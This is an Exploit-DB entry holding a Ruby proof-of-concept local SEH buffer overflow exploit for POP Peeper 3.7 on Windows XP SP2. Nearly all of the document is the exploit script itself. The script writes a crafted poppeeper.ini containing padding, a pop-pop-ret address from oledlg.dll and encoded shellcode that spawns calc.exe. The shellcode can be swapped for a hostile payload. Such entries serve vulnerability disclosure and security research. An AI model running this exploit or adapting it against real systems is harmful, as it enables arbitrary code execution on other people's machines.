POP Peeper 3.7 SEH Exploit

2011-03-18T00:00:00
ID EDB-ID:16999
Type exploitdb
Reporter Anastasios Monachos
Modified 2011-03-18T00:00:00

Description

POP Peeper 3.7 SEH Exploit. Local exploit for windows platform

                                        
                                            #!/usr/bin/ruby
#############################################################################
# Title:		POP Peeper 3.7 SEH Exploit
# Tested on: 	Windows XP SP2 EN
# Target:  		POP Peeper 3.7.0.0
# Download Link:	http://www.poppeeper.com/download.php
# Author:		Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
# Greetz: 		offsec team, inj3ct0r team
#############################################################################
appdata = ENV['APPDATA'] 
file = appdata +"\\POP Peeper\\poppeeper.ini"
f = open(file, "wb")
eb = "\xeb\x06\x90\x90"
ppr = "\x67\x15\xD3\x74"	#Module Name=C:\WINDOWS\system32\oledlg.dll version=1.0 (XPClient.010817-1148)
#Spawn calc.exe, bad characters: \x00\x0a\x0d
shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5a\xb8\x30\xe7\x16\x7d\x33\xc9" +
"\xb1\x33\x31\x42\x17\x83\xc2\x04\x03\x72\xf4\xf4\x88\x8e" +
"\x12\x71\x72\x6e\xe3\xe2\xfa\x8b\xd2\x30\x98\xd8\x47\x85" +
"\xea\x8c\x6b\x6e\xbe\x24\xff\x02\x17\x4b\x48\xa8\x41\x62" +
"\x49\x1c\x4e\x28\x89\x3e\x32\x32\xde\xe0\x0b\xfd\x13\xe0" +
"\x4c\xe3\xdc\xb0\x05\x68\x4e\x25\x21\x2c\x53\x44\xe5\x3b" +
"\xeb\x3e\x80\xfb\x98\xf4\x8b\x2b\x30\x82\xc4\xd3\x3a\xcc" +
"\xf4\xe2\xef\x0e\xc8\xad\x84\xe5\xba\x2c\x4d\x34\x42\x1f" +
"\xb1\x9b\x7d\x90\x3c\xe5\xba\x16\xdf\x90\xb0\x65\x62\xa3" +
"\x02\x14\xb8\x26\x97\xbe\x4b\x90\x73\x3f\x9f\x47\xf7\x33" +
"\x54\x03\x5f\x57\x6b\xc0\xeb\x63\xe0\xe7\x3b\xe2\xb2\xc3" +
"\x9f\xaf\x61\x6d\xb9\x15\xc7\x92\xd9\xf1\xb8\x36\x91\x13" +
"\xac\x41\xf8\x79\x33\xc3\x86\xc4\x33\xdb\x88\x66\x5c\xea" +
"\x03\xe9\x1b\xf3\xc1\x4e\xd3\xb9\x48\xe6\x7c\x64\x19\xbb" +
"\xe0\x97\xf7\xff\x1c\x14\xf2\x7f\xdb\x04\x77\x7a\xa7\x82" +
"\x6b\xf6\xb8\x66\x8c\xa5\xb9\xa2\xef\x28\x2a\x2e\xde\xcf" +
"\xca\xd5\x1e")

f.write("\r\n[Act_"+"\x41"*1088+eb+ppr+shellcode+"]\r\nEnabled = 1\r\n")
f.close()